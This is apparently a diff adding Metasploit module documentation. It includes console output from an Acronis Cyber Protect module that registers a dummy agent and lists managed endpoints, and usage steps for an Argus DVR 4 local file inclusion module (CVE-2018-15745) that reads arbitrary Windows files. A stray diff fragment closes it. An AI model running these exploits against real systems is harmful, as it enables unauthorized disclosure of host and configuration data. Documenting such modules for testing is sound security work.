+[+] parentId: phm-group.7C2057CC-8D32-40CA-9B83-4A8E73078F7F.disks
+[+] key: phm.0CA16CD4-1C6D-44D2-BEF1-B9F146005EE1@28BAFD9F-F9F1-481F-A970-1A6ED70736AC.disks
+[*] type: machine
+[*] hostname: WIN-BJDNH44EEDB
+[*] IP: 192.168.201.5
+[*] OS: Microsoft Windows Server 2019 Standard
+[*] ARCH: windows
+[*] ONLINE: false
+[*] ----------------------------------------
+[+] hostId: 345C3F1E-92C3-4E92-8EF8-AC6BF136BB83
+[+] parentId: phm-group.7C2057CC-8D32-40CA-9B83-4A8E73078F7F.disks
+[+] key: phm.F70D1B08-5097-4CE5-8E22-F9E0DB75401F@345C3F1E-92C3-4E92-8EF8-AC6BF136BB83.disks
+[*] type: machine
+[*] hostname: AcronisAppliance-AC319
+[*] IP: 192.168.201.6
+[*] OS: GNU/Linux
+[*] ARCH: linux
+[*] ONLINE: true
+[*] Auxiliary module execution completed
+```
+### Acronis Cyber Backup 15 build 27009 VMware appliance
+```msf
+msf6 auxiliary(gather/acronis_cyber_protect_machine_info_disclosure) > run
+[*] Running module against 192.168.201.6
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Retrieve the first access token.
+[*] Register a dummy backup agent.
+[*] Dummy backup agent registration is successful.
+[*] Retrieve the second access token.
+[+] The target appears to be vulnerable. Acronis Cyber Protect/Backup 15.0.27009
+[*] Retrieve all managed endpoint configuration details registered at the Acronis Cyber Protect/Backup appliance.
+[*] List the managed endpoints registered at the Acronis Cyber Protect/Backup appliance.
+[*] ----------------------------------------
+[+] hostId: D287E868-EDBB-4FE9-85A9-F928AA10EE5D
+[+] parentId: 00000000-0000-0000-0000-000000000000
+[+] key: phm.EA9A6E26-38B5-4727-9957-FD7CDD7BF2CC@D287E868-EDBB-4FE9-85A9-F928AA10EE5D.disks
+[*] type: machine
+[*] hostname: AcronisAppliance-FCD94
+[*] IP: 192.168.201.6
+[*] OS: Linux: CentOS Linux release 7.6.1810 (Core)
+[*] ARCH: linux
+[*] ONLINE: true
+[*] ----------------------------------------
+[+] hostId: C0FBDC6F-A5FE-4710-ADE8-99B3F8A7CE1E
+[+] parentId: 00000000-0000-0000-0000-000000000000
+[+] key: phm.1100195A-112E-4904-A933-264C2D12A4A5@C0FBDC6F-A5FE-4710-ADE8-99B3F8A7CE1E.disks
+[*] type: machine
+[*] hostname: victim.evil.corp
+[*] IP: 192.168.201.2
+[*] OS: Microsoft Windows Server 2022 Standard
+[*] ARCH: windows
+[*] ONLINE: false
+[*] Auxiliary module execution completed
+```
+
+## Limitations
+No limitations.
@@ -0,0 +1,46 @@
+## Vulnerable Application
+This module leverages an issue with how the `RESULTPAGE` parameter within `WEBACCCOUNT.cgi` handles file referencing and as a result is vulnerable to Local File Inclusion (LFI). 
+
+## Options
+To successfully read contents of the Windows file system you must set the full file path of the file you want to check using `TARGET_FILE` (not including the drive letter prefix). 
+As a first run it is recommended to try leaking `Windows/system.ini` as a validation exercise on your first module run.
+
+## Testing
+To setup a test environment, the following steps can be performed:
+1. Set up a Windows operating system (any OS that has C:\Windows\system.ini)
+2. Download the [Argus DVR 4 Software](https://download.cnet.com/argus-surveillance-dvr/3000-2348_4-10576796.html)
+3. Run the Argus software and a webpage running on port 8080 will appear. Take note of the machine's IP
+4. On your attacker machine follow the verification steps below.
+
+## Verification Steps
+1. start msfconsole
+2. `use auxiliary/gather/argus_dvr4_lfi_cve_2018_15745`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set TARGET_FILE Windows/system.ini`
+5. `run`
+
+## Scenarios
+### Utilising Argus DVR 4 CVE-2018-15745 to Leak DVRParams.ini
+```
+msf6 > use auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745 
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > set RHOSTS 192.168.1.15
+RHOSTS => 192.168.1.15
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > set TARGET_FILE ProgramData/PY_Software/Argus Surveillance DVR/DVRParams.ini
+TARGET_FILE => ProgramData/PY_Software/Argus Surveillance DVR/DVRParams.ini
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > run
+[*] Running module against 192.168.1.15
+[*] Sending request to 192.168.1.15:8080 for file: ProgramData/PY_Software/Argus%20Surveillance%20DVR/DVRParams.ini
+[+] File retrieved successfully!
+[Main]
+ServerName=
+ServerLocation=
+ServerDescription=
+ReadH=0
+UseDialUp=0
+DialUpConName=
+DialUpDisconnectWhenDone=0
+DIALUPUSEDEFAULTS" checked checked
+
+[*] Auxiliary module execution completed
+
+```
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .1.5
 .2.5